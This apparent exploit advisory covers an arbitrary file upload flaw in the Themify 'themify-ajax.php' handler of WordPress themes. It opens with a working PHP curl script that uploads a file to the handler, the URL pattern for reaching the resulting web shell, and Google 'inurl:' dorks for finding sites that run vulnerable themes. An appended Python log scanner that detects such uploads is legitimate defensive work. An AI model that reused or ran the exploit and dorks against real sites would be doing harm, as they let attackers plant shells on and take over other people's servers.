Arbitrary File Upload
Exploit : /wp-content/themes/<theme-name>/themify/themify-ajax.php
Example :
Elemin theme :
http://yourtarget.com/wp-content/themes/elemin/themify/themify-ajax.php
Script :
<?php
$uploadfile="inc0vers.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://yourtarget.com/wp-content/themes/<theme-name>/uploads/<uploaded-file>
Code:
inurl:"/wp-content/themes/Elemin/"
inurl:"/wp-content/themes/Bloggie/"
inurl:"/wp-content/themes/Tisa/"
inurl:"/wp-content/themes/Funki/"
inurl:"/wp-content/themes/Pinboard/"
inurl:"/wp-content/themes/FOlo/"
inurl:"/wp-content/themes/grido/"
inurl:"/wp-content/themes/Suco/"
inurl:"/wp-content/themes/iThemes2/"
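
Detection :
Added example, not part of the original advisory: a log check for the two requests described above, the POST to themify-ajax.php with the upload parameter and a script file later requested from the theme's uploads directory. The common/combined log format, the sample lines and the reading of status 200 as "handler answered / file served" are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common/combined log format: ip - - [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Upload handler and upload directory, as given on this page.
AJAX = re.compile(r'^/wp-content/themes/([^/]+)/themify/themify-ajax\.php$', re.I)
SCRIPT = re.compile(r'^/wp-content/themes/([^/]+)/uploads/[^/]+\.(?:php\d?|phtml|phar)$', re.I)

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "POST /wp-content/themes/elemin/themify/themify-ajax.php?upload=1 HTTP/1.1" 200 31',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/themes/elemin/uploads/sample.php HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-content/themes/elemin/uploads/logo.png HTTP/1.1" 200 9000',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "POST /wp-content/themes/Tisa/themify/themify-ajax.php?upload=1 HTTP/1.1" 404 0',
    '192.0.2.55 - - [01/Jan/2024:10:03:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 2',
]

def scan(lines):
    """Return (kind, ip, theme, status) for each suspicious request, in log order."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        url = urlsplit(m["target"])
        path, status = unquote(url.path), int(m["status"])
        hit = AJAX.match(path)
        if hit and m["method"] == "POST" and "upload" in parse_qs(url.query, keep_blank_values=True):
            findings.append(("upload_attempt", m["ip"], hit.group(1).lower(), status))
        hit = SCRIPT.match(path)
        if hit:  # an image upload directory should never serve script files
            findings.append(("script_in_uploads", m["ip"], hit.group(1).lower(), status))
    return findings

def likely_compromised(findings):
    """Themes where an upload POST answered 200 and a script was later served with 200."""
    uploaded, compromised = set(), set()
    for kind, _ip, theme, status in findings:
        if kind == "upload_attempt" and status == 200:
            uploaded.add(theme)
        elif kind == "script_in_uploads" and status == 200 and theme in uploaded:
            compromised.add(theme)
    return compromised

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
    print("review first:", sorted(likely_compromised(scan(SAMPLE))))
```

A theme returned by likely_compromised() should have its uploads directory inspected on disk; a 404 on the upload POST only shows the handler was probed.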